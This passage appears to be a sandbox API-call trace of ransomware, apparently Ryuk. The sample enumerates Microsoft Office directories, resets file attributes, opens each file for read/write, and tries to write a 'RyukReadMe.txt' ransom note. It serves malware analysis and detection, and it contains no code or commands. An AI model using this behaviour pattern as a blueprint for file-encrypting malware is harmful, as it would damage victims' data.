dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.057] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.057] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.057] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.057] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.057] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_K_COL.HXK", dwFileAttributes=0x80) returned 0 [0136.057] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\excel.dev_k_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.057] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.057] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.057] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.057] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.058] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.HXS", dwFileAttributes=0x80) returned 0 [0136.058] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\excel.hxs"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.058] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.058] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.058] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.058] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.058] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_COL.HXC", dwFileAttributes=0x80) returned 0 [0136.058] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\excel_col.hxc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.058] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.058] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.059] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.059] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.059] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_COL.HXT", dwFileAttributes=0x80) returned 0 [0136.059] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\excel_col.hxt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.059] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.059] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.059] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.059] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.059] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_F_COL.HXK", dwFileAttributes=0x80) returned 0 [0136.059] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\excel_f_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.060] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.060] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.060] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.060] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.060] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_K_COL.HXK", dwFileAttributes=0x80) returned 0 [0136.060] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\excel_k_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.060] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.060] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.060] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.060] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.060] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.060] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXPTOOWS.XLA", dwFileAttributes=0x80) returned 0 [0136.061] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXPTOOWS.XLA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\exptoows.xla"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.061] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.061] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.061] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.061] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.062] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\FACILITY.VSL", dwFileAttributes=0x80) returned 0 [0136.062] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\FACILITY.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\facility.vsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.063] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.063] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.063] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.063] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.063] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\FLOCH.VRD", dwFileAttributes=0x80) returned 0 [0136.064] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\FLOCH.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\floch.vrd"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.064] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.064] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.064] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.064] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.064] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\FOREST.CSS", dwFileAttributes=0x80) returned 0 [0136.065] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\FOREST.CSS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\forest.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.065] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.065] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.065] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.065] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.065] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GANTT.CSS", dwFileAttributes=0x80) returned 0 [0136.066] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GANTT.CSS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\gantt.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.066] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.066] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.066] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.066] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.066] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GANTT.VRD", dwFileAttributes=0x80) returned 0 [0136.066] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GANTT.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\gantt.vrd"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.066] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.066] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.067] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.067] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.067] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GANTT.VSL", dwFileAttributes=0x80) returned 0 [0136.067] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GANTT.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\gantt.vsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.067] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.067] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.068] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.068] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.068] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GR8GALRY.GRA", dwFileAttributes=0x80) returned 0 [0136.068] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GR8GALRY.GRA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\gr8galry.gra"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.068] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.068] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.068] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.068] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.068] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH.HXS", dwFileAttributes=0x80) returned 0 [0136.068] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\graph.hxs"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.069] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.069] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.069] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.069] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.069] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_COL.HXC", dwFileAttributes=0x80) returned 0 [0136.070] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\graph_col.hxc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.070] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.070] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.070] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.071] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.071] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_COL.HXT", dwFileAttributes=0x80) returned 0 [0136.071] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\graph_col.hxt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.071] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.071] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.071] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.071] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.072] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_F_COL.HXK", dwFileAttributes=0x80) returned 0 [0136.072] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\graph_f_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.072] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.072] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.072] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.072] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.072] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_K_COL.HXK", dwFileAttributes=0x80) returned 0 [0136.072] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\graph_k_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.072] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.072] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.073] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.073] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.073] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.073] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.073] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.073] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.073] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Groove Starter Template.xsn", dwFileAttributes=0x80) returned 0 [0136.073] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Groove Starter Template.xsn" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\groove starter template.xsn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.073] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.073] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.073] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.073] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.073] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE.HXS", dwFileAttributes=0x80) returned 0 [0136.074] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\groove.hxs"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.074] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.074] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.074] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.074] SetLastError (dwErrCode=0x0) [0136.074] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.075] GetLastError () returned 0x5 [0136.075] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0136.075] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.075] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0136.076] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.076] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.076] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.077] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\BG_ADOBE.GIF", dwFileAttributes=0x80) returned 0 [0136.077] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\BG_ADOBE.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\bg_adobe.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.077] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.077] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.078] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.078] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.078] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\bg_Casual.gif", dwFileAttributes=0x80) returned 0 [0136.078] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\bg_Casual.gif" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\bg_casual.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.078] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.078] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.079] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.079] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.079] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\bg_Country.gif", dwFileAttributes=0x80) returned 0 [0136.079] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\bg_Country.gif" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\bg_country.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.079] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.079] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.079] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.079] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.079] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\bg_Earthy.gif", dwFileAttributes=0x80) returned 0 [0136.079] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\bg_Earthy.gif" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\bg_earthy.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.080] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.080] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.080] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.080] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.080] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\bg_GreenTea.gif", dwFileAttributes=0x80) returned 0 [0136.080] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\bg_GreenTea.gif" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\bg_greentea.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.080] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.080] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.080] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.080] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.080] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\bg_Groove.gif", dwFileAttributes=0x80) returned 0 [0136.081] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\bg_Groove.gif" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\bg_groove.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.081] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.081] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.081] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.081] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.081] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\bg_LightSpirit.gif", dwFileAttributes=0x80) returned 0 [0136.082] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\bg_LightSpirit.gif" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\bg_lightspirit.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, 